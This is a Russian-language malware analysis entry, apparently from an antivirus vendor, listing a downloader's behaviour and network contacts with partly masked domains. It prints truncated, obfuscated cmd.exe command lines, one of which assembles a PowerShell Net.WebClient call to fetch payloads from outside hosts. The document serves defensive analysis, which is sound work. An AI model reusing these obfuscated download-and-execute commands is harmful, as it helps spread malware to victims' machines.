Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:\C"set xgz==r{89p.o;g_tu@-57hszb'6FIc)BeayD$iL+\N2lkJP% 4GY(m3HT}ZnS:jxORKEA\Wv1f,wU0CdM~&&for %m in (5,7,71,43,42,72,27,34,24,74,57,77,15,70,68,43,1,...
Сетевая активность
Подключается к
- 'sc####nbedrijf.nl':80
UDP
- DNS ASK ah####versity.com
- DNS ASK me######ton.sandboxph.com
- DNS ASK pt##.club
- DNS ASK ai###npro.co.za
- DNS ASK sc####nbedrijf.nl
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' \c %ProgramData:~0,1%%ProgramData:~9,2% \V:\C"set xgz==r{89p.o;g_tu@-57hszb'6FIc)BeayD$iL+\N2lkJP% 4GY(m3HT}ZnS:jxORKEA\Wv1f,wU0CdM~&&for %m in (5,7,71,43,42,72,27,34,24,74,57,77,15,70,68,43,1,...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /V:/C"set xgz==r{89p.o;g_tu@-57hszb'6FIc)BeayD$iL+\N2lkJP% 4GY(m3HT}ZnS:jxORKEA/Wv1f,wU0CdM~&&for %m in (5,7,71,43,42,72,27,34,24,74,57,77,15,70,68,43,1,43,56,63,56,56,24,60,37,37,64,76,63,57,7...
- '<SYSTEM32>\cmd.exe' /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $u5844='d1794';$h9410=new-object Net.WebClient;$k3609='http://ah####versity.com/lW8Z9O0kOlt@http://www.megafighton.sandboxph.c...
- '<SYSTEM32>\cmd.exe'
